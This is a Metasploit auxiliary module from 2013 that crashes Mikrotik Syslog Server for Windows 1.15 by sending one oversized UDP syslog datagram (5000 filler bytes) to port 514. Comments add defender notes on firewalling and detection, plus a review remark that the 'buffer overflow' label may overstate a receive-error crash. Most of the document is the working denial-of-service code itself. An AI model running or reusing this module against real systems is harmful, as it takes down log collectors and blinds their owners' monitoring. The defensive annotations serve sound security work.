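# Exploit Title: Mikrotik Syslog Server for Windows - remote BOF DOS
# Date: 19.04.2013
# Exploit Author: xis_one@STM Solutions
# Vendor Homepage:www.mikrotik.com
# Software Link: http://www.mikrotik.com/download/MT_Syslog.exe
# Version: 1.15 (most recent version 19.04.2013)
# Tested on: Windows XP SP3, Windows 7 SP1

require 'msf/core'

# Auxiliary denial-of-service check for the Mikrotik Syslog Server for Windows.
#
# The module sends a single oversized UDP syslog datagram to the collector.
# According to the author's header, version 1.15 crashes on receipt. The
# demonstrated impact is availability only: the collector stops, so log
# collection from every source that reports to it is lost until restart.
#
# NOTE(review): the title calls this a buffer overflow, but the description
# attributes the crash to WSAEMSGSIZE. Winsock reports that error when a
# datagram is larger than the receive buffer supplied, which points to an
# unhandled receive error rather than demonstrated memory corruption.
# Confirm the root cause before rating this as an overflow.
#
# Defender notes:
# - Syslog over UDP carries no sender authentication, so any host that can
#   reach the listener can deliver this datagram. Limit 514/udp on the
#   collector to known log sources with a host firewall or network ACL.
# - RFC 3164 caps a syslog packet at 1024 bytes; datagrams far above that
#   size addressed to 514/udp are a practical detection signal.
# - Alert on unexpected exit of the collector process and on gaps in
#   received logs.
# - The header lists 1.15 as the most recent release at the time, so no
#   fixed version is identified on this page.
class Metasploit3 < Msf::Auxiliary

  include Msf::Exploit::Remote::Udp
  include Msf::Auxiliary::Dos

  # Registers the module metadata and the default target port (514/udp).
  def initialize
    super(
      'Name'           => 'Mikrotik Syslog Server for Windows - remote BOF DOS',
      'Description'    => %q{
        This module triggers the windows socket error WSAEMSGSIZE (message to long) in the Mikrotik Syslog Server for Windows v 1.15 and crashes it.
        The long syslog message overwrite the allocated buffer space causing the socket error.
      },
      'Author'         => 'xis_one@STM Solutions',
      'License'        => MSF_LICENSE,
      'DisclosureDate' => 'Apr 19 2013')

    register_options(
      [
        Opt::RPORT(514)
      ])
  end

  # Sends one oversized syslog-style datagram to the configured host.
  #
  # The message is a priority field ("<0>"), a date-like token, a host
  # field, a tag, and 5000 filler bytes; the filler is what pushes the
  # datagram past the size the listener is reported to handle.
  #
  # @return [void]
  def run
    connect_udp
    begin
      pkt = "<0>" + "Apr19 " + "10.0.0.2 " + "badass" + ": " + "A" * 5000
      print_status("Crashing the remote Mikrotik syslog server #{rhost}")
      udp_sock.put(pkt)
    ensure
      # Release the socket even if the send raises, so it is not leaked.
      disconnect_udp
    end
  end
end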